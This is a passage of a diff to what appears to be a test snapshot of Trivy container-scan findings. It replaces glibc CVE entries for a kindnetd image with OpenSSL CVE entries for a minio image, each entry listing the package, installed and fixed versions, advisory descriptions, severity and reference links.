"https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.5", - "packageName": "libdb5.3", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + 